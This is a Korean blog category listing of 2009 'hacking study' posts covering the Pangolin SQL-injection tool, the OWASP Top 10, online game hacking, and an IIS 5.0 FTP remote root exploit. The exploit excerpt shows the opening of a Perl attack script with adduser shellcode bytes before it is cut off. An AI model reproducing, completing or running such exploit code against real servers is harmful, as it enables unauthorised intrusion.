본문 바로가기

기타/해킹 공부16

pangolin_free_edition_2.5.2.975 Pangolin runs on Windows , and performs as more as possible pen-testing through Sql injection. The supported operations for the newest version of Pangolin : * MSSQL : Server informations, Datas, CMD execute, Regedit, Write file, Download file, Read file, File Browser… * MYSQL : Server informations, Datas, Read file, Write file… * ORACLE : Server informations, Datas, Accounts cracking… * PGSQL : .. 2009. 12. 4.
OWASP 10대 취약점과 국정원 8대 취약점 OWASP는 Open Web Application Security Project의 약자 입니다 오픈 웹 응용 프로그램 보안 프로젝트 (OWASP)은 전세계 자유 및 오픈 커뮤니티 소프트웨어 응용 프로그램의 보안 향상에 초점을 맞추어서 발표 하는 것 입니다 현재 OWASP는 2003, 2007이 발표 되어 있습니다. OWASP 2009는 작성중에 있습니다 이번년도 말쯤에 나올 듯싶네요 OWASP 2007 자료(한글) http://www.metasecurity.org/owasp/OWASP_Top_10_2007_Korean.pdf OWASP 2007 자료(영문) http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP 2004 자료(영문) http://dow.. 2009. 10. 26.
IIS 5.0 FTPd / Remote r00t exploit 간만에 Remote 공격 스크립트가 나왔다 ^^; iiz5.pl 로 저장하자 #!/usr/bin/perl # IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2googlemail.com # Affects IIS6 with stack cookie protection # August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser "winown:nwoniw" $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . "\x49\x.. 2009. 9. 3.
게임 해킹 2009년 2월 10일 화요일 온라인 게임 서비스 공격 출처 : http://sone.tistory.com/28 온라인 게임 서비스 공격 현황&원리 (중국매크로, 계정 해킹 등) * 이 글은 비단 테일즈위버 뿐만이 아닌 , 모든 온라인게임에 해당되는 글임을 미리 밝힙니다. * 2006년 KISA( 한국정보보호진흥원 ) 에서는 온라인 게임 해킹 대응이란 주제로 문서파일을 배포했습니다. 이 문서에는 국내 온라인게임의 시장 현황, 서비스 구동방식 , 공격현황과 , 그에 따른 대응책 등이 서술되어 있습니다. 정독해본결과 , 최근현황과 크게 다르지 않다고 판단되어 , 문서 내용 중 일부인 , 온라인 게임 서비스 공격 현황에 대해서 글을 옮겨봅니다. 이 공격 현황이란 주제는 대부분 온라인게임에서 골칫거리로 문제되고.. 2009. 8. 10.

티스토리툴바